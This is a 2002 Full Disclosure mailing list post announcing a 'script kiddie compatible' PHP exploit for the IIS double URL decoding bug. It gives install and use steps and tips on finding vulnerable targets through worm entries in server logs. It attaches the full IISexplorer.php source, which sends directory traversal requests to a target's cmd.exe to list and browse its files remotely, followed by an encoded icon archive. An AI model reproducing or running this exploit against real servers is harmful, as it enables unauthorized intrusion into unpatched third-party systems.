Full Disclosure mailing list archives
IIS double UTF decoding bug (old) exploit: IIS explorer
From: full-disclosure () lists netsys com (Berend-Jan Wever)
Date: Thu, 11 Jul 2002 17:28:06 +0200
This is a multi-part message in MIME format. ------=_NextPart_000_000A_01C22900.51AF7FB0 Content-Type: multipart/alternative; boundary="----=_NextPart_001_000B_01C22900.51AF7FB0" ------=_NextPart_001_000B_01C22900.51AF7FB0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable (Ok, it's an old bug but since a lot of non-geeks seem to hate updating = their IIS, there still are plenty of valid targets for this exploit.) -- SCRIPT KIDDIE COMPATIBLE EXPLOIT ATTACHED -- The attached file IISexploere.php is my "SCRIPT KIDDIE COMPATIBLE" = exploit for the double urldecoding bug in IIS. (It's a modified version = of PHPexplorer, also written by yours truly ;) -- HOW TO INSTALL -- Simply put all the icons in the RAR file and the file IISexplorer.php on = your PHP enabled webserver. The icons should go into the /icons2/ = directory, the IISexplorer.php file can be put anywere. -- HOW TO USE -- Browse to http://your-server/path/IISexplorer.php?host=3D[ip of = vulnerable target] and you can browse the target system using an = explorer style interface. Please remember, this is version 0.1 beta! So don't expect it to handle = errors well. -- WHERE TO FIND TARGETS TO EXPLORE -- Scan your webserver's logfiles for "GET = /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" to get a list of = vulnerable IIS's that have been infected with a worm that propagates = through this vulnerability. -- NOTES -- The left frame takes some time to load, since it requires 1 http request = for each directory in the list. Make sure to have a decent connection to = the internet because this migth use quite some bandwidth ;) -- FUTURE VERSIONS -- I'm probably not gonna invest more time, since it works. Maybe I'm gonna = put in a upload/download facility but that would make stuff a bit too = easy for them 14 year olds, wouldn't it ? -- YOURS TRULY -- Berend-Jan Wever aka SkyLined http:/spoor12.edup.tudelft.nl . ------=_NextPart_001_000B_01C22900.51AF7FB0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=3DContent-Type content=3D"text/html; = charset=3Diso-8859-1"> <META content=3D"MSHTML 6.00.2716.2200" name=3DGENERATOR> <STYLE></STYLE> </HEAD> <BODY bgColor=3D#ffffff> <DIV><FONT face=3DArial size=3D2>(Ok, it's an old bug but since a lot of = non-geeks=20 seem to hate updating their IIS, there still are plenty of valid targets = for=20 this exploit.</FONT><FONT face=3DArial size=3D2>)</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>-- SCRIPT KIDDIE COMPATIBLE EXPLOIT = ATTACHED=20 --</FONT></DIV> <DIV><FONT face=3DArial size=3D2>The attached file IISexploere.php is my = "SCRIPT=20 KIDDIE COMPATIBLE" exploit for the double urldecoding bug in IIS. (It's = a=20 modified version of PHPexplorer, also written by yours truly = ;)</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>-- HOW TO INSTALL --</FONT></DIV> <DIV><FONT face=3DArial size=3D2>Simply put all the icons in the RAR = file and the=20 file IISexplorer.php on your PHP enabled webserver. The icons should go = into the=20 /icons2/ directory, the IISexplorer.php file can be put = anywere.</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>-- HOW TO USE --</FONT></DIV> <DIV><FONT face=3DArial size=3D2>Browse to <A=20 href=3D"http://your-server/path/IISexplorer.php?host=3D[ip of vulnerable = target]">http://your-server/path/IISexplorer.php?host=3D[ip=20 of vulnerable target]</A> and you can browse the target system = using an=20 explorer style interface.</FONT></DIV> <DIV><FONT face=3DArial size=3D2>Please remember, this is version 0.1 = beta! So don't=20 expect it to handle errors well.</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2> <DIV><FONT face=3DArial size=3D2>-- WHERE TO FIND TARGETS TO EXPLORE = --</FONT></DIV> <DIV><FONT face=3DArial size=3D2>Scan your webserver's logfiles for "GET = /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" to get a list of=20 vulnerable IIS's that have been infected with a worm that propagates = through=20 this vulnerability.</FONT></DIV> <DIV> </DIV> <DIV>-- NOTES --</DIV></FONT></DIV> <DIV><FONT face=3DArial size=3D2>The left frame takes some time to load, = since it=20 requires 1 http request for each directory in the list. </FONT><FONT = face=3DArial=20 size=3D2>Make sure to have a decent connection to the internet because = this migth=20 use quite some bandwidth ;)</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>-- FUTURE VERSIONS --</FONT></DIV> <DIV><FONT face=3DArial size=3D2>I'm probably not gonna invest more = time, since it=20 works. Maybe I'm gonna put in a upload/download facility but that would = make=20 stuff a bit too easy for them 14 year olds, wouldn't it ?</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>-- YOURS TRULY --</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>Berend-Jan Wever aka = SkyLined</FONT></DIV> <DIV><FONT face=3DArial = size=3D2>http:/spoor12.edup.tudelft.nl</FONT></DIV> <DIV><FONT face=3DArial size=3D2>.</FONT></DIV></BODY></HTML> ------=_NextPart_001_000B_01C22900.51AF7FB0-- ------=_NextPart_000_000A_01C22900.51AF7FB0 Content-Type: application/octet-stream; name="IISexplorer.php" Content-Transfer-Encoding: quoted-printable Content-Disposition: attachment; filename="IISexplorer.php" <HTML><?php //--- copyright information = --------------------------------------------------- global $program_name; $program_name =3D 'PHP Explorer v0.3 beta'; global $copyright; $copyright =3D "\n". = "-----------------------------------------------------------------------\= n". $program_name." - Written in may and june 2002 by B.J.W. Wever.\n". "Copyright (C) 2002 Berend-Jan Wever <SkyLined () edup tudelft nl>\n". "http://Spoor12.edup.tudelft.nl/SkyLined\n". "\n". "This program is free software; you can redistribute it and/or\n". "modify it under the terms of the GNU General Public License\n". "version 2, 1991 as published by the Free Software Foundation.\n". "\n". "This program is distributed in the hope that it will be useful,\n". "but WITHOUT ANY WARRANTY; without even the implied warranty of\n". "MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n". "GNU General Public License for more details.\n". "\n". "A copy of the GNU General Public License can be found at:\n". " http://www.gnu.org/licenses/gpl.html\n". "or you can write to:\n". " Free Software Foundation, Inc.\n". " 59 Temple Place - Suite 330\n". " Boston, MA 02111-1307\n". " USA.\n". = "-----------------------------------------------------------------------\= n"; //--- initialise global variables = --------------------------------------------- global $link_header; $link_header =3D $_SERVER['PHP_SELF']; global $path_root; $path_root =3D ''; global $path_open; $path_open =3D ''; global $hostname; $hostname =3D ''; $i_am_tree =3D false; $i_am_list =3D false; //--- read parameters = --------------------------------------------------------- $parameters =3D explode('&', $argv[0]); for ($i=3D0; $i<count($parameters); $i++) { list($parameter, $value) =3D explode('=3D', $parameters[$i], 2); switch ($parameter) { case "root" : $path_root =3D make_valid_path(urldecode($value)); = break; case "open" : $path_open =3D make_valid_path(urldecode($value)); = break; case "host" : $hostname =3D urldecode($value); break; case "tree" : $i_am_tree =3D true; break; case "list" : $i_am_list =3D true; break; } } //--- handle file uploads = ----------------------------------------------------- if ($_SERVER['REQUEST_METHOD']=3D=3D'POST') { $source_path =3D $HTTP_POST_FILES['userfile']['tmp_name']; $destination_path =3D = './'.make_valid_path($path_open.'/'.$HTTP_POST_FILES['userfile']['name'])= ; move_uploaded_file($source_path, $destination_path); } //--- display the index, the tree or the list = --------------------------------- if ($hostname =3D=3D '') { echo wrap_rem($copyright); echo wrap_body('<H1>Host not specified</H1>Please use = "../IISexplorer.php?host=3D<I>ip or hostname</I>."'); } elseif (!$i_am_tree && $i_am_list) { echo create_header().wrap_body(create_list($path_open)); } elseif ($i_am_tree && !$i_am_list) { echo create_header().wrap_body(create_tree(false, '', $path_root, = true)); } else { echo wrap_rem($copyright); if (!$i_am_tree && !$i_am_list) { echo '<FRAMESET framespacing=3D"0" frameborder=3D"no" cols=3D"300, = *">'. '<FRAME name=3D"tree" style=3D"border-right: 2px inset" = src=3D"'.$link_header.'?tree&'.implode('&', $argv).'">'. '<FRAME name=3D"main" style=3D"border-left: 2px inset" = src=3D"'.$link_header.'?list&'.implode('&', $argv).'">'. '</FRAMESET>'; } else { echo wrap_body("<H1>Illegal command line option</H1> IISexplorer = can't be <B>tree</B> <I>and</I> <B>list</B> at the same time."); } } //-----------------------------------------------------------------------= ------ //--- list creating function = -------------------------------------------------- function create_list($path) { global $hostname, $path_root, $path_open; $result =3D '<TR><TD><BUTTON style=3D"width:100%; = text-align:left;">Name</BUTTON>'. '<TD><BUTTON style=3D"width:100%; = text-align:left;">Size</BUTTON>'; $total_size =3D 0; list($success, $dirs, $files) =3D get_directory_contents($path); if ($success) { if (count($dirs)>0) { sort($dirs); for ($i=3D0; $i<count($dirs); $i++) { $result .=3D '<TR><TD><NOBR>'.show_dir('', $dirs[$i]). '<TD class=3D"nosize"><NOBR><DIR>'; } } if (count($files)>0) { sort($files); for ($i=3D0; $i<count($files); $i++) { if (substr($files[$i], -5)=3D=3D'.phpe') { $result .=3D '<TR><TD><NOBR>'.show_phpe($files[$i]); } else { $result .=3D '<TR><TD><NOBR>'.show_file($files[$i]); } // $result .=3D '<TD = class=3D"size"><NOBR>'.readable_size(filesize($files[$i])); // $total_size +=3D filesize($files[$i]); $total_size =3D 0; } } } // $disk_free_percentage =3D round(100* = disk_free_space('./'.$path_open) / disk_total_space('./'.$path_open)); $result =3D '<FORM id=3D"oForm" enctype=3D"multipart/form-data" = method=3D"post" = action=3D"?list&host=3D'.$hostname.'&root=3D'.$path_root.'&open=3D'.$path= _open.'">'. '<TABLE width=3D"100%">'.$result.'</TABLE>'. '<CENTER>'. '<HR>'. '<B>'.count($dirs).' </B>'.one_or_many(count($dirs), = 'directory', 'directories').', '. '<B>'.count($files).' </B>'.one_or_many(count($files), = 'file', 'files').', '. '</CENTER>'. '</FORM>'; /* '<HR>'. '<NOBR>'. 'To <B>upload</B> a file click '. '<INPUT type=3D"file" name=3D"userfile" = style=3D"border:0px; width:0%; height:18px;">'. ' and select a file, then click '. '<INPUT type=3D"submit" value=3D"Upload" = style=3D"border:0px; height:18px;">'. ' to upload the file.'. '</NOBR>'. 'disk space used: = <B>'.readable_size($total_size).'</B>, '. 'free disk space: = <B>'.readable_size(disk_free_space('./'.$path_open)).'</B>.'. '<TABLE width=3D"90%"><TR>'. '<TD class=3D"useddiskspace" = width=3D"'.(100-$disk_free_percentage).'%">'.(100-$disk_free_percentage).= '% used'. '<TD = class=3D"freediskspace">'.$disk_free_percentage.'% free'. '</TABLE>'. */ return $result; } //-----------------------------------------------------------------------= ------ //--- tree creating function = -------------------------------------------------- function create_tree($show_header, $header, $path, $last_entrie) { $result =3D ($show_header ? $header.create_icon('tree'.($last_entrie = ? '_last' : '')) : ''). create_icon('folder_error').last_part($path).'<BR>'; list($success, $dirs, $files) =3D get_directory_contents($path); if ($success) { $icon1 =3D 'tree'.($last_entrie ? '_last' : ''); if (count($dirs)>0) $icon1 .=3D '_branched'. (is_open($path) ? = '_open' : '_closed'); $icon2 =3D 'tree'.($last_entrie ? '_empty' : '_straight'); if ($show_header) { $ownheader =3D $header.create_icon($icon1); $subheader =3D $header.create_icon($icon2); } else { $ownheader =3D ''; $subheader =3D ''; } $result =3D show_dir($ownheader, $path)."<BR>"; if (count($dirs)>0 && is_open($path)) { sort($dirs); for ($i=3D0; $i<count($dirs); $i++) { $result .=3D create_tree(true, $subheader, $dirs[$i], = $i=3D=3Dcount($dirs)-1); } } } return $result; } //-----------------------------------------------------------------------= ------ //--- general functions = ------------------------------------------------------- function show_dir($header, $path) { global $path_open; $name =3D last_part($path); if ($name =3D=3D '') { $name =3D first_part($_SERVER['PHP_SELF']); } $link =3D create_phpexplorer_url($path); if ($path =3D=3D $path_open) { $result =3D $header.wrap_class('open', = create_icon('folder_open').$name); } else { $result =3D $header.create_icon('folder_closed').$name; } return wrap_A('_top', $link, $result); } function show_file($path) { $name =3D last_part($path); $link =3D = '/'.make_valid_path(make_valid_path(first_part($_SERVER['PHP_SELF'])).'/'= .make_valid_path($path)); $icon =3D find_icon($path); return wrap_A('_blank', $link, create_icon($icon).$name); } function show_phpe($path) { $name =3D substr(last_part($path), 0, strlen(last_part($path))-5); $link =3D = '/'.make_valid_path(make_valid_path(first_part($_SERVER['PHP_SELF'])).'/'= .make_valid_path($path)); $icon =3D find_icon($path); $phpe =3D file($path); for ($i=3D0; $i<count($phpe); $i++) { if (substr($phpe[$i], 0, 5)=3D=3D'ICON=3D') $icon =3D = substr($phpe[$i], 5, 256); if (substr($phpe[$i], 0, 5)=3D=3D'LINK=3D') $link =3D = substr($phpe[$i], 5, 256); } return wrap_A('_blank', $link, create_icon($icon).$name); } //-----------------------------------------------------------------------= ------ //-----------------------------------------------------------------------= ------ function is_open($path) { global $path_open; return strstr($path_open.'/', $path.'/') !=3D=3D false; } function make_valid_path($path) { while (substr($path, 0, 2) =3D=3D './') $path =3D substr($path, 2, = strlen($path)-2); while (substr($path, 0, 1) =3D=3D '/') $path =3D substr($path, 1, = strlen($path)-1); while (substr($path, -1) =3D=3D '/') $path =3D substr($path, 0, = strlen($path)-1); if ($path =3D=3D '.') { $path =3D ''; } elseif ( (strstr($path, '..') !=3D=3D false) || (strstr($path, '//') !=3D=3D false) || (substr($path, 0, 1) =3D=3D '/') ) { $path =3D ''; } return $path; } function last_part($path) { if (($result =3D substr(strrchr($path, '/'), 1)) =3D=3D=3D false) $result =3D $path; return $result; } function first_part($path) { return dirname($path); } //-----------------------------------------------------------------------= ------ //-----------------------------------------------------------------------= ------ function create_header() { return '<HEAD><STYLE>'. 'BODY, IMG, TABLE, TR, TD, A, A:visited, A:active {'. 'margin:0px; '. 'border:0px; '. 'padding:0px; '. 'font:14 tahoma,sans-serif; '. 'vertical-align:top; '. 'text-decoration:none; '. 'border-collapse:collapse; '. 'border-spacing:0; '. '} '. 'BUTTON, INPUT {'. 'font:14 tahoma,sans-serif; '. 'vertical-align:top; '. 'padding-left:5px; '. 'height:22; '. '}'. '.open {'. 'background:silver; '. '}'. '.nosize {'. 'color:silver; '. 'text-align:center; '. '}'. '.size {'. 'text-align:right; '. '}'. '.useddiskspace {'. 'color: white; '. 'font-weight: bold; '. 'border: 1px solid black; '. 'background-color:maroon; '. '}'. '.freediskspace {'. 'color: white; '. 'font-weight: bold; '. 'text-align:right; '. 'border: 1px solid black; '. 'background-color:green; '. '}'. '</STYLE></HEAD>'; } function wrap_rem($innerHTML) { return = '<!--'.$innerHTML.'-->'; } function wrap_body($innerHTML) { return = '<BODY><NOBR>'.$innerHTML.'</NOBR></BODY>'; } function wrap_class($class, $innerHTML) { return '<SPAN = class=3D"'.$class.'">'.$innerHTML.'</SPAN>'; } function wrap_A($target, $href, $innerHTML) { return '<A = target=3D"'.$target.'" href=3D"'.$href.'">'.$innerHTML.'</A>'; } function create_icon($icon) { return '<IMG = src=3D"/icons2/19x18_'.$icon.'.gif">'; } function create_phpexplorer_url($path) { global $hostname, = $path_root; return = '?host=3D'.$hostname.'&root=3D'.$path_root.'&open=3D'.$path; } function find_icon($path) { $file_array =3D explode('.', $path); switch ($file_array[count($file_array)-1]) { case "jpg" : $icon =3D 'file_image'; break; case "gif" : $icon =3D 'file_image'; break; case "png" : $icon =3D 'file_image'; break; case "doc" : $icon =3D 'file_document'; break; case "txt" : $icon =3D 'file_text'; break; case "xls" : $icon =3D 'file_excell'; break; case "html" : $icon =3D 'ie'; break; case "htm" : $icon =3D 'ie'; break; case "php" : $icon =3D 'ie'; break; case "link" : $icon =3D 'folder_link'; $link =3D implode('', = file($path)); break; default : $icon =3D 'file'; break; } return $icon; } function readable_size($size) { $size2 =3D 'bytes'; if ($size >=3D 1024*1024*1024) { $size =3D eregi_replace("([0-9]\.[0-9])[0-9]*", "\\1", = $size/(1024*1024*1024)); $size2 =3D 'Gb'; } elseif ($size >=3D 1024*1024) { $size =3D eregi_replace("([0-9]\.[0-9])[0-9]*", "\\1", = $size/(1024*1024)); $size2 =3D 'Mb'; } elseif ($size >=3D 1024) { $size =3D eregi_replace("([0-9]\.[0-9])[0-9]*", "\\1", = $size/(1024)); $size2 =3D 'Kb'; } return $size.' '.$size2; } function one_or_many($count, $one, $many) { return ($count=3D=3D1 ? $one : $many); } function get_directory_contents($path) { global $hostname; $result =3D false; $temp =3D urlencode('..\\..'.(substr($path, 0, 1) =3D=3D '\\' ? '' : = '\\').str_replace('/', '\\', $path)); $command =3D = 'http://'.$hostname.'/scripts/..%252F../winnt/system32/cmd.exe?/c+dir+/A+= /-C+/X+'.$temp; if (($directory_handle =3D fopen($command, 'r')) !=3D=3D false) { if (($temp =3D fgets($directory_handle, 1024)) !=3D=3D false) { // 1st line: " Directory of x:\xxxxx" $result =3D (substr($temp, 0, 14) =3D=3D ' Directory of '); while (($temp =3D fgets($directory_handle, 1024)) !=3D=3D false) = { // "dd/mm/yyyy hh:mma <DIR> xxxxx FILENAME.EXT = LONGFILENAME..." // "0.10...... 12.6.. 19.19.............. 39.12....... = 55.X..........." if (strlen($temp) > 55) { // 2nd line: "" // 1st to last: " xxxxx File(s) xxxxx = bytes" // last line: " xxxxx Dir(s) xxxxx = bytes free" $date =3D substr($temp, 0, 10); $time =3D substr($temp, 12, 6); $size =3D trim(substr($temp, 19, 19)); $dosname =3D trim(substr($temp, 39, 12)); $fullname =3D trim(substr($temp, 55)); $name =3D ($dosname =3D=3D '' ? $fullname : $dosname); if (substr($name, 0, 1) !=3D '.') { if ($size =3D=3D '<DIR>') { $dirs[] =3D make_valid_path($path.'/'.$name); } else { $files[] =3D make_valid_path($path.'/'.$name); } } } } } fclose($directory_handle); } return array($result, $dirs, $files); } ?></HTML> ------=_NextPart_000_000A_01C22900.51AF7FB0 Content-Type: application/x-rar-compressed; name="icons2.rar" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="icons2.rar" UmFyIRoHAM+QcwAADQAAAAAAAAC4K3SAgC4AvwEAAFICAAACTiqORjC+6CwUMw4AIAgAADE5eDE4 X2luZm8uZ2lmCh3gGMiAAAAZH82fTNsrm1ql2VtrwvTWmlR9N6O2NTZmWuGkMXOgrcIogvQnpnzz ZyPBBQQQ8eL6HgPLLwQePgY0wm4QRuUXJJhq4Ppg8jON6f/0hq41t+H/eHwPnP4H38T/vwv+44GC +bN/EuM/bumUsSxYS1aS9eTJkThwm7dpvHib9+UGCUKERxxRIhRYpZuaW1tFKlFt7Zbm5O398uHh Lg4KMuWW9vTk0y4uIps2kaMyZP/on0KBbOzH/SdIkRyKiXGoCeJomD8iWPuPsN0fMfISh8B7hHCQ 2BrjWGqIw1AgM4ZIyBFEMHg4Yo9o9g9Y9Q9I9A848w8o8g8Y8IgDvjDGEO0HovQ0FKbM46s5tSo/ jAM6tNKfJmKo0KAcfDiY57lnzmbn/SXrVkbZGsmt1ldY01jVKKpihd49ugbaKlNXZouIbnoI8tdy ebz0ej3j7lE1bWVFTzEnXdOuEja0xQvSvsM68krDFNil2MI560R5XIFhaoWz94e86aC2uVq69ga0 7j57DxLaSh18Ht/hX4LLM7PvrFzbJv26742GX0sSDn52Z9VTvAP0dWF9KjS0OpZumFypv9OS1xg5 ye90gIAuAIoAAACKAAAAAk7QDVOcrecsFDAOACAIAAAxOXgxOF9jaGF0LmdpZkdJRjg5YRMAEgCi AAD////+/v7b29vLy8utra0AAAD///8AAAAh+QQBAAAGACwAAAAAEwASAAADT2i63P4wSliqrbGG zTduxQYIo2AKAVEwYWAJBRwPhLqE5akL9KqEMFnMMhDYfsWdiVDssZLDyqByZM14BFOxCrJkadxM 7TMxWMostHrNSAAAO7nsdICALQCpAQAAqQEAAAIpyDqyqaHoLBQzDQAgCAAAMTl4MThfY29nLmdp ZgndoczMgAAAIRv2urW5GbRtGyKbFsCismujZf//SXbGmuitFDNNyxeKXiheKFB4xeNLREY8687V aGobhqbYNulDGwTG2NKYxrxRQeCPNF5Ighv4dYtojH0z59++eeelfnz0f2u4pIH4HYnQuQQjCzJ2 jOnsqtBVaktVqVdmyFiySSWyGDGmqrSMNN/enLmTL6J176rklyagyjQaGvYrPocy/xaotaXtMXGF /0JagGtFoJs9i++9K3zZPgFwGAXC0GyFkLAVWoF0sFIFQoBPCcGiEwJYJgNpXdGtNLprLEtUHMEH KBn4b4H8GWKAK7//TE4X2vZ4u3A6tO1NbcXu+Xj3fiRRwfb2HPryDu753kH0725wfbYUX9GhCrZ5 Fb6fl/vqaXecepHU0IOLJSjyn3W6nXcc99jwC28bwysrB8hz3onlnwaEmRnpyfKcejjQzym1GSjT TKNx+dkR44y3kKL/Y4uvluzoBh56T0/EhxI2GPO1en2SjicBggddRIp4hwxIsZLpaymTChsW+hHw h7fGN3GIkI10Zub73/10/vb82Z3+V06wmwkgscB0gIAvALIDAAAmBAAAAsBkQGIylucsFDMPACAI AAAxOXgxOF9lYXJ0aC5naWYR3AAcyIgAABnbULIopCbGxl1zjK84xuUIyOUUdtY3n5G8D9vPfnee P28TYNseCuDGDAbYJ5SJgMJgGHsRPBD3T1SLNQqcld1dR/EETJz1dT/U13XPXU3NJc+j/nof56R+ 989F/e4ybME+GCHDTob9QwbV0/DpaXf6Pudj3vi7nw9nQxsnMEGW7Oyu/TqWk3UKxBysnjoQipYi TgQk21EmGDKyupsorFJn4cqqFonYtAEKNMNyhceogbUCd9u/JEAHk56y2cLLJ0srFp64QXW/6lQH KVYgspnjC2eqVk+eablI8FGVwkurD06EWcYCSwE+Z8tcaqGpXVBVVg42solT7hrq1NYxxRdQMPsR dSp3BhUOPr6NS447flHW8GapjVAA7GGKuiUOKVTWXmFitXr/hM64gfAoT9WSVMyYAI9MvqF7bjrW YXKtaJHVjyxg4xakDyEoxZE6wI0y/xSI6hIhPgrCjRaRNFeIzUUiExTJzyBwC0dBJLMKqYqkj0EF 00bXD5hAboG6dI2UJwlb+xgH2CJCuRmQTf/JnZHOkKHIBvkF0bY8xhKmsZSodooEd3Y2kA2y4uv7 SmWdGcbEm0Fbr0UZpfSmlxJO843IrkXa7eekccGzwU1pEs3cIBy+ZJfMo2fo9ccw5sEykE7cXMNa 0MuoKXkw3NrFeX0oKLeKrKEntbddaxGsO3SuXJmvr0dzcuMPDwH9edtoYD56kkRllraPIkJN7XOd 9PEe9LCsMX2a/C5j26hu87JucXmwZN/dy7+BdWbKVIdYUiBIiQceO4x719o5nN+PpSPB3cvJ5j/M 5/L0vgk6nzZXf0ff92VfdfMx/kxYmhm4f0dXG8ep8v15d94O5m/fn5v5/TneX8j7erKv41t08G97 2rq+PyAb+dFB+2w9D+rshiP9vPEw0z5vo2zGGsqT1rRBkEdG07y8qSizP8bMaXjc/gzcY2WL7RJS BvR6OtQsdbTxCqfQEDXY2ZEU9iRvyEzvpyVwJz0v01gWM1uuLe1qwcP3s17A6krdMp6+NNyai6Zx R3iHdbbCiDfeRar8O7gH8gxbbgfMdfYbciBd9T7rcPicLAVwv3JItrd7KiCleIGIewaaOclzpKIN 2+y3hwu1+e4ix92+sNToeGFJFTA3idsmm7X1S1/Yifl9lBCXjN1tSeVqbH8b6WBnAUOe76GmM201 jSbCpOiiKiXERE+phldjvUOclzy7advLsTvx5ReWj74+r9XaBQh0O33/t5d1McCfnA1OE0l0gIAu AHwAAAB8AAAAAslFyPg4Z7UsFDAOACAIAAAxOXgxOF9maWxlLmdpZkdJRjg5YRMAEgCiAACEhoTG x8b///8AAAD///8AAAAAAAAAAAAh+QQBAAAEACwAAAAAEwASAAADQUi63E4gyvkUEDjjAOrVWSB0 zgcKQzqUpxasjdm+bLvBjHzSsX3XNl7OJxAudCCjhaiEMHHHgHRKbaquWGhlS0gAADvsd3SAgDcA igAAAIoAAAACPP231DF4tSwUMBcAIAgAADE5eDE4X2ZpbGVfZG9jdW1lbnQuZ2lmR0lGODlhEwAS AKIAAAAA/4SGhMbHxv///wAAAAAAAAAAAAAAACwAAAAAEwASAAADVzi63D4hyvlUqIE0QLjvGjSE CrmVRLp8LCG8g0CCIzB4ihCTdq+5rthu8WPddEjeDQjQuWAyYm2psC2i1cozSWzhriZL4wUNiyrD RoDMZpszqbhcha4rEgA7Ekl0gIA0AIkAAACJAAAAAlJp0xRyd7UsFDAUACAIAAAxOXgxOF9maWxl X2V4Y2VsLmdpZkdJRjg5YRMAEgCiAAAAhgCEhoTGx8b///8AAAAAAAAAAAAAAAAsAAAAABMAEgAA A1Y4utw+Icr5VKiBNBD46hc0aB/ngYBCrOSQmmggzIPQum4sKLu95ZyZsHYzATs84gL2Ag19FiaQ AT0ajb2bZQmqKRsXYY9W/VR4Woh4PUtnWHD4eb5IAAA7v8F0gIA0ALIAAACyAAAAAssdN+YmZ7Us FDAUACAIAAAxOXgxOF9maWxlX2ltYWdlLmdpZkdJRjg5YRMAEgCzAAAA//8AhoQAhgCEhoTGx8aE AAD///8AAAD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAh+QQBAAAIACwAAAAAEwASAAAEXxDJSatF I+t95TBgCBJD94khYZTWALwwcMxzG8MzQBy2iwsHHa+SCbgGBwFQ2Ao4BwSl8rBrGnfSYJV4JWCn W0rGSwaHJ2Oyt0AeijeawtiNRqHOHrXeS5fQ/oB9HYMRADv+dXSAgDMAhAAAAIQAAAACMfWC1wuR 5ywUMBMAIAgAADE5eDE4X2ZpbGVfdGV4dC5naWZHSUY4OWETABIAogAAhIaExsfG////AAAA//// AAAAAAAAAAAAIfkEAQAABAAsAAAAABMAEgAAA0lIutyug8QpHxEREM2rA1g4iNgnnGgaRA2YvquJ DSN9xu0Ls4xL/yMBrqdT8RY+YHCILKKYiiTwdow6qTIndBPoer9biVJpKT8SADuTfHSAgDcADgIA AJUDAAACIr83bwaGiiwUMxcAIAgAADE5eDE4X2ZvbGRlcl9jbG9zZWQuZ2lmCdlVFUyYAAAc216C esRBGMRFBgqCNCNe4oo2ILGUtCK1NHRhsYLKZWtLQ0rLUGGE6iitKQg/wWCCShJBgjh25JQ1slEr lMGrux5mJhwXes+Hbr2bzes81rOc+I/vPhPlXQ6PP5fMuYQ3g2gL5qM6DKyMDbGMlBi0Wiz5ISQa DQaDPy1kVlZWVn2kkRkZGRnWxIGDBraysFahE7j82gm96sRa2uLHtntknK1BkIK+SxOVqDIRR+XY i05GoLmrpgsW1xac/a3ykk0WBFgWCephApb7lBOaMDViDW1lvrE22INOBdyROSSRGoMjij8udQba 7Dt6+SMw6ql/iUTIsNVJKFIPErBWnS6CebFTe9SKyXy30gbba1Z5Xd3OCvknIzyPfL9PgyoZoEhg wxYqGDgheESZFhuaBCLODwKwVqgncihzKhqR/Q3lp3i4Q+e2sV+DS7q+wCvoQr5IRSs7issisdna rBwq8BVpCpoKiwr3AqtCu4K5nvu3Revdi3C7OvTbu1Mf6XH7w4n623/fx/A5BsP4mMDKGjuODi+z zfPv4GFx+L4M+5pdrc6NzY0MnN5WT9+HxtPx5/o1O3usPfafV9vp+uXq+7I3uLs+f7Zmr8fVj9nB /vOam30Pf3OnrY3h5PXytiGzr3szneLWx+BiZHS8uJ5Mb8//1NfUzuF3u78vp8M7revB0svD3+7H NCA5dICAQQCtAAAArQAAAAKIq/H1F3rZLBQwIQAgCAAAMTl4MThfZm9sZGVyX2RvY3VtZW50c19j bG9zZWQuZ2lmR0lGODlhEwASALMAAGNjnM7O/zGc/87//5ycAISEAM7OY///nP//zv/OnP///wAA AP///wAAAAAAAAAAACH5BAEAAAwALAAAAAATABIAAARakMlJq63gagnG2lMhdkrwbYVhkMJgaoQq q0RtVwSi7zxyGCdJ7kAsGhNAytBITBycycmS+XxGhb5jFRpkTIvO8NWb3W6R3VzYnGiPY7O4rMtY 2O94PGjP30QAADtEZ3SAgD8AUAIAALYDAAACdsHLgQOGiiwUMx8AIAgAADE5eDE4X2ZvbGRlcl9k b2N1bWVudHNfb3Blbi5naWYJ2ZUVDIAAABzbmzVCKGtDFERlKCg/yU6YyRRqaH+SCNbTK10MFFqR +AIybK2JDWhwe0QjQ6tUF3Q3VoQkUUJhsQiCpIiCJqsBWpINM7wnc6zN6Dz3PgzZyvm8znuee+5v fiP7zz4dy8LlcXjdC8LblqkUYpssw1moyFrWuPFptNppkY4w2Gw2GnLW4s1ms1mm0pxRqNRqNFsn CMjI5qwsBaY0bic14i9KkNOatpjtktcllm8XACpkkSyzeLgFE5chpyyjeKGqJhSJq2nLJ2sYSQaL YBYgwR1LGBLTceIzNYKkMOasN9bRbIYcsQdymjI44o3i4gonLlnjNXIRvRgjEOrWH+ToGQYa1glJ YB2hYC0iW8RzWrF6U4s1RhvqYLZq1mkro7kBUySyjSR4w/R4MtQmgnBBgixahBxKDwaDIMNDQlAW QHYFgLTxG41QzLUKcT0NJaR4oEJnmrKH8NDuh7AUPQih5IBSE7lCWShHY2oQcUHgUGkUDQoCxQ7g oLRQ3ChmS+iUVGjaiijpUorVp+0o6Ow5WPYX9Yixsa4C4F7vVPzuF1yb3/Ot7/NlO131K+kx8Jld 1C0Npe8zMyuRi6W24W4sUNOvTn+nC6t32NLOp/P15Pf+1CLk093g9mf7PxvC7fuzafD7uT0cCp8O dib7ByMqxj6eZ08+zU72h1L/Z+K9w+vVwO5Pzp3A9Vbw2etb6WtzfL7eDo+DiV52/q1vvz6tvN7V 5n19TR8lvLyKGH+7731vp6PHucSt+bFm6/Wp8fNusv5efaz7ouOALXJ0gIA2AFABAABkAQAAAsnh shPSgessFDMWACAIAAAxOXgxOF9mb2xkZXJfZXJyb3IuZ2lmCUAB1InAAAAU2/f3+rdLt5e9bz0q 